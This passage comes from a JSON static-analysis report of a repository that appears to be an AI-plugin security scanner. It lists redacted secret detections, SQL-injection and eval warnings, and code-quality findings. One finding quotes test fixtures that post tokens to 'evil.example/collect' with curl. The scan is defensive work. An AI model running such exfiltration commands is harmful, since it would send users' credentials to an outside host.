"efae4921c7074ab5ebe5b7bf03c24118557383ad0f80588d1942e9ff1089d37d", "category": "quality", "severity": 
"high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|efae4921c7074ab5ebe5b7bf03c24118557383ad0f80588d1942e9ff1089d37d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 117}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144874, "scanner": "repobility-ast-engine", "fingerprint": "79982cffef3546c5bbf5fdb8d943c7debf6f1ecebd799c8d8ebae54a03e34fd3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|79982cffef3546c5bbf5fdb8d943c7debf6f1ecebd799c8d8ebae54a03e34fd3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 98}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_one_input"}, "properties": {"repobilityId": 144873, "scanner": "repobility-ast-engine", "fingerprint": "59de520859315b7b50f46962b4aac44d5502ff79ccdeecd3594adce6261d6be6", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": 
"fp|59de520859315b7b50f46962b4aac44d5502ff79ccdeecd3594adce6261d6be6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "fuzzers/manifest_fuzzer.py"}, "region": {"startLine": 9}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145062, "scanner": "gitleaks", "fingerprint": "905e53e2d13c9100d835138606ea6f382ae1a884f735fb057810aa9b7dff8ce4", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|tests/test_guard_runtime.py|1814|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 18149}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145061, "scanner": "gitleaks", "fingerprint": "149523da61adfa6dd413950d6cac9987bb93df0fef492b534d387697564a6ba7", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|99|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 996}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145060, "scanner": "gitleaks", 
"fingerprint": "c647e629c4abea946752f83b2fd932e09b77b7245f2adc3debb891998ed5c35b", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|94|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 944}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145059, "scanner": "gitleaks", "fingerprint": "94f2642d02de73dd1dcf7fbfdacc656362a601174ae524a8d6feeddd868facea", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|88|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 885}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145058, "scanner": "gitleaks", "fingerprint": "dcfbaa365add4f0762d2f70658cc910ef9ea96dd64b968f6f7dbb89d647a3557", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|79|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": 
"tests/test_guard_store_migrations.py"}, "region": {"startLine": 796}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145057, "scanner": "gitleaks", "fingerprint": "02dc6cf8b5cea72e46eaf179eb09834ca91c764751be5b3a5198463eb0108e48", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|72|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 730}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145056, "scanner": "gitleaks", "fingerprint": "b8c71626de7f93e024a6e513d9979f598c4a7c2c38aa6b2c59ab67c16b94bb59", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|66|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 670}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145055, "scanner": "gitleaks", "fingerprint": "e2c95624f937647598e82b0be4a85f239db02464e76316297bf069b74e40b662", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, 
"triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|47|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 471}}}]}, {"ruleId": "curl-auth-user", "level": "error", "message": {"text": "Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed resource."}, "properties": {"repobilityId": 145054, "scanner": "gitleaks", "fingerprint": "04f30d8efc2fb2dab8d9040b43f9fcd93419e980e32d9d54052226bb4588860d", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "curl -d \"token=<redacted>\" https://evil.example/collect',\n        \"curl -u REDACTED https://evil.example/collect\",\n        \"curl --user REDACTED", "rule_id": "curl-auth-user", "scanner": "gitleaks", "detector": "curl-auth-user", "correlation_key": "secret|tests/test_guard_risk.py|381|curl -d token redacted token curl -u redacted token curl --user redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_risk.py"}, "region": {"startLine": 3818}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145053, "scanner": "gitleaks", "fingerprint": "dfbf33e33a1e1fc6bf63391dbf7f7aee485cc9e178e6f67bde722a8f575a1d2e", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": 
"secret|token|119|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1198}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145052, "scanner": "gitleaks", "fingerprint": "537477e81ee68e45e36a063a15535d620dcf7166d672947c72758895ca633904", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|108|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1089}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145051, "scanner": "gitleaks", "fingerprint": "62689e4c3249b9936d42a4fc9bfde667b351f17cef23019b11cbe698a7cf3c47", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|100|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1006}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145050, "scanner": "gitleaks", "fingerprint": 
"8d3b7935294f9ea6973191e088e41eff177fa9297a25f2675b46ddaf3b83ce59", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "key=REDACTED\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|20|key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 205}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145049, "scanner": "gitleaks", "fingerprint": "6c30a7989b0dca3b922d57c13cd7f501582282355d1c660e01c4335812943d51", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "OPENAI_API_KEY=<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|3|openai_api_key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 33}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145048, "scanner": "gitleaks", "fingerprint": "f9c36cd132374dcedf110d3d7e36661fed3e5ccfbe0a103a03a28f7e32e648a3", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "dashboard_session_token=\"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": 
"secret|token|170|dashboard_session_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_headless_daemon_api.py"}, "region": {"startLine": 1706}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145047, "scanner": "gitleaks", "fingerprint": "259dd2013b3fe00a96f86e5d3301a985cac0a64bff029c1ddd12ce2d56190678", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "token=\"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|168|token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_headless_daemon_api.py"}, "region": {"startLine": 1684}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145046, "scanner": "gitleaks", "fingerprint": "3e29f12f8e4c6df6dcaa3cc44e77a057829a87b6718bb1c32a7583a33de06a8c", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "accessToken\": \"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|44|accesstoken : redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 449}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": 
{"repobilityId": 145045, "scanner": "gitleaks", "fingerprint": "ae44b4c78eb7d9c96a1b1b35e8b9e615b989e3876f5e467a058a01eee0828a95", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "NPM_TOKEN=<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|43|npm_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 431}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145044, "scanner": "gitleaks", "fingerprint": "4a0eb899d58925d2c03638a968e7aa2eb877a5eb2b3a4b5a115aa00576e37b3b", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "NPM_TOKEN=<redacted>", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|23|npm_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 240}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145043, "scanner": "gitleaks", "fingerprint": "aab38d19ac4bbbb38d82fdd981b8585ba4d8877bf9b7e772ed1c2212d237f754", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", 
"correlation_key": "secret|token|5|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_source_view_secret_fixtures.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145042, "scanner": "gitleaks", "fingerprint": "2821afb30755bd86d881250ce5a70236c5b57c36097a45521f33788710810627", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|1|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_source_view_secret_fixtures.py"}, "region": {"startLine": 19}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145041, "scanner": "gitleaks", "fingerprint": "7e6612dc43ef88095cf023f927065794533185fe5c79e0a09b596efca25a116a", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|35|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_product_flow.py"}, "region": {"startLine": 356}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145040, "scanner": "gitleaks", 
"fingerprint": "f16248a4f5ed49409b9069c68b5a1ef5a7e12dd5ee8ca023cd80197b5add03cd", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|29|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 294}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145039, "scanner": "gitleaks", "fingerprint": "7396cba5dd9e09b49d8e82f432b20c5bba05064512c6e2cc0e4c03484355921f", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|23|redacted", "duplicate_count": 1, "duplicate_rule_ids": ["github-pat"], "duplicate_scanners": ["gitleaks"], "duplicate_fingerprints": ["7396cba5dd9e09b49d8e82f432b20c5bba05064512c6e2cc0e4c03484355921f", "74d9d31907e4a0f67f849d715db8effafc8f2d9bfcd93e6398f05ccc8bf10f49"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 231}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145038, "scanner": "gitleaks", "fingerprint": "5a00daf3ca9b042d6191a380e8e71d5cf7fadd6455dcab0a74643dbf9cef4070", "category": 
"credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|22|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 227}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145037, "scanner": "gitleaks", "fingerprint": "82165df2e50e23bfd2f9cc4e562cb1c189f00a5a7325d4b90620c0aaae1daf9f", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "API_KEY = \"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|1|api_key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/bad-plugin/secrets.js"}, "region": {"startLine": 1}}}]}, {"ruleId": "curl-auth-header", "level": "error", "message": {"text": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed resource."}, "properties": {"repobilityId": 145036, "scanner": "gitleaks", "fingerprint": "af73bf6033599c4e415fca82c1cd93b158721e2bf9320149f46d8eba8f22aa14", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "curl -H \"Authorization: Bearer <redacted>\"", "rule_id": "curl-auth-header", "scanner": "gitleaks", "detector": "curl-auth-header", "correlation_key": "secret|token|1|curl -h authorization: bearer redacted"}}, "locations": [{"physicalLocation": 
{"artifactLocation": {"uri": "tests/fixtures/guard-red-team/benign-docs-fake-token.py"}, "region": {"startLine": 20}}}]}, {"ruleId": "MINED007", "level": "error", "message": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection."}, "properties": {"repobilityId": 145023, "scanner": "repobility-threat-engine", "fingerprint": "1814a1fe41890f274843b118382664f7309e9ba5f2d6ce0d727045e848418251", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "sql-string-concat", "owasp": "A03:2021", "cwe_ids": ["CWE-89"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347914+00:00", "triaged_in_corpus": 20, "observations_count": 210457, "ai_coder_pattern_id": 12}, "scanner": "repobility-threat-engine", "correlation_key": "fp|1814a1fe41890f274843b118382664f7309e9ba5f2d6ce0d727045e848418251"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "MINED007", "level": "error", "message": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... 
{user_input} ...\") \u2014 SQL injection."}, "properties": {"repobilityId": 145022, "scanner": "repobility-threat-engine", "fingerprint": "ea382d1ad6747f26d6456c67beda2cb8a82d8d38572529464c519358161b3f0a", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "sql-string-concat", "owasp": "A03:2021", "cwe_ids": ["CWE-89"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347914+00:00", "triaged_in_corpus": 20, "observations_count": 210457, "ai_coder_pattern_id": 12}, "scanner": "repobility-threat-engine", "correlation_key": "fp|ea382d1ad6747f26d6456c67beda2cb8a82d8d38572529464c519358161b3f0a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_evidence.py"}, "region": {"startLine": 173}}}]}, {"ruleId": "MINED024", "level": "error", "message": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. 
Code injection risk."}, "properties": {"repobilityId": 144985, "scanner": "repobility-threat-engine", "fingerprint": "7db08097913be7e867234a05c54aabea62a1e3d131f2da7cfed20ec0338b0fd6", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-eval-usage", "owasp": null, "cwe_ids": ["CWE-95"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347954+00:00", "triaged_in_corpus": 20, "observations_count": 35589, "ai_coder_pattern_id": 103}, "scanner": "repobility-threat-engine", "correlation_key": "fp|7db08097913be7e867234a05c54aabea62a1e3d131f2da7cfed20ec0338b0fd6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/app-catalog.js"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED024", "level": "error", "message": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. 
Code injection risk."}, "properties": {"repobilityId": 144984, "scanner": "repobility-threat-engine", "fingerprint": "a927cc95e013f48134b1452ccafa48b9648ef9de423c9809414e32d38419c204", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-eval-usage", "owasp": null, "cwe_ids": ["CWE-95"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347954+00:00", "triaged_in_corpus": 20, "observations_count": 35589, "ai_coder_pattern_id": 103}, "scanner": "repobility-threat-engine", "correlation_key": "fp|a927cc95e013f48134b1452ccafa48b9648ef9de423c9809414e32d38419c204"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/apps/app-catalog.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144972, "scanner": "repobility-ast-engine", "fingerprint": "d025ab005dd5f06801932d55ec8a72a15f8d2b4eee354ecb2e0a78695ae1467d", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d025ab005dd5f06801932d55ec8a72a15f8d2b4eee354ecb2e0a78695ae1467d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/cli/commands.py"}, "region": {"startLine": 5317}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `warnings` used but not imported"}, "properties": {"repobilityId": 144971, "scanner": 
"repobility-ast-engine", "fingerprint": "551e855466352b1b817acab0fb89c2191400757852f6f73ac7a322e7a04d20e5", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|551e855466352b1b817acab0fb89c2191400757852f6f73ac7a322e7a04d20e5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/cli/install_commands.py"}, "region": {"startLine": 236}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144970, "scanner": "repobility-ast-engine", "fingerprint": "ae6ff6f22e989085e049beda30f0d7b421a60cd7804288d5b26d2b8fb003cb6c", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ae6ff6f22e989085e049beda30f0d7b421a60cd7804288d5b26d2b8fb003cb6c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/consumer/service.py"}, "region": {"startLine": 252}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144969, "scanner": "repobility-ast-engine", "fingerprint": "82edd02b60100497209b5ced2735394bb587e8e99e3a2bcdeb5656121053c506", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": 
true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|82edd02b60100497209b5ced2735394bb587e8e99e3a2bcdeb5656121053c506"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/decisions.py"}, "region": {"startLine": 154}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144968, "scanner": "repobility-ast-engine", "fingerprint": "22e2bdcb9191fc2c202703fc50d6aa79e2f09ff9a081b923150507e443a4db6a", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|22e2bdcb9191fc2c202703fc50d6aa79e2f09ff9a081b923150507e443a4db6a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/cisco_preflight.py"}, "region": {"startLine": 215}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144967, "scanner": "repobility-ast-engine", "fingerprint": "551eab17d25265938f952fd7a29d84b51db67e417cff978fce6ee882a1cf49d6", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": 
